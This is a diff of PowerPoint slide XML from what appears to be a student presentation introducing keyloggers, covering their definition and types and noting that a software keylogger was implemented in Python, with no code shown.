+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>o</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-15" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>p</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>o</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="25" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>s</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-30" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>t</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-30" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>o</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>n</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1200150" lvl="2" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="15" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> The</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="20" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Wow</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="85" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>In</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-5" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="15" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Your</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-10" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="20" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Solution</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1200150" lvl="2" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" b="1" spc="15" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="15" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>M</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>o</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-15" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>e</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-30" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>ll</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-5" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="30" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>n</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="5" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Trebuchet MS"/>
+              </a:rPr>
+              <a:t>g</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1200150" lvl="2" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" b="1" spc="5" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="5" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Results</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1200150" lvl="2" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" b="1" spc="5" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="5" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Conclusion</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -5253,6 +7716,379 @@
           <a:chExt cx="0" cy="0"/>
         </a:xfrm>
       </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="TextBox 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE280AE9-6751-A374-757B-1AC5D027EF77}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="0"/>
+            <a:ext cx="12192000" cy="2585323"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>                                 Introduction to Keylogger</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="TextBox 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A308BE-B074-229F-53B3-9457E2E92078}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="762000" y="1676400"/>
+            <a:ext cx="7315200" cy="3785652"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>A keylogger, sometimes called a keystroke logger, is a type of surveillance technology used to monitor and record each keystroke on a specific device, such as a computer or smartphone. It can be either hardware- or software-based. The latter type is also known as system monitoring software or keyboard capture software.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Types of Keyloggers:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1257300" lvl="2" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="§"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="323E48"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Software keyloggers</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1257300" lvl="2" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="§"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="323E48"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Hardware keyloggers</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="323E48"/>
+                </a:solidFill>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>In this we can see about software keyloggers.</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="2400" i="0" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="323E48"/>
+              </a:solidFill>
+              <a:effectLst/>
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2341270011"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A6036BF-3F25-B1C7-6F6F-AABAA7480BBD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="5867400" cy="1231106"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>What are Software Keyloggers?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C3EE06C-0E7B-1AF9-B662-BEE56BC340E7}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="838200" y="1371600"/>
+            <a:ext cx="7467600" cy="5262979"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="q"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>A keylogging software program does not require physical access to the user's computer for installation. It can be purposefully downloaded by someone who wants to monitor activity on a particular computer, or it can be malware downloaded unwittingly by the user of the keyboard and its device, and then executed as part of a rootkit or remote administration Trojan. Either way, keylogging software allows an unauthorized threat actor to view the user's keystrokes, and then use this knowledge to access and compromise the device.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="q"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>In this we can see about software keylogger implemented using python language. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="6" name="Picture 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1997855-33F3-7F9E-CE2C-082E1912AD3C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8458200" y="2492535"/>
+            <a:ext cx="3657600" cy="2295718"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2860372183"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide6.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
       <p:grpSp>
         <p:nvGrpSpPr>
           <p:cNvPr id="2" name="object 2"/>
@@ -5261,7 +8097,7 @@
         </p:nvGrpSpPr>
         <p:grpSpPr>
           <a:xfrm>
-            <a:off x="7991475" y="2933700"/>
+            <a:off x="9429750" y="3570953"/>
             <a:ext cx="2762250" cy="3257550"/>
             <a:chOff x="7991475" y="2933700"/>
             <a:chExt cx="2762250" cy="3257550"/>
@@ -5556,182 +8392,6 @@
       </p:pic>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="9" name="object 9"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="739775" y="6473337"/>
-            <a:ext cx="1798955" cy="191770"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="12700">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="55"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1100" spc="20" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>3/21/202</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="130" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="50" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>A</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>nnu</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>al</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-140" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>R</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
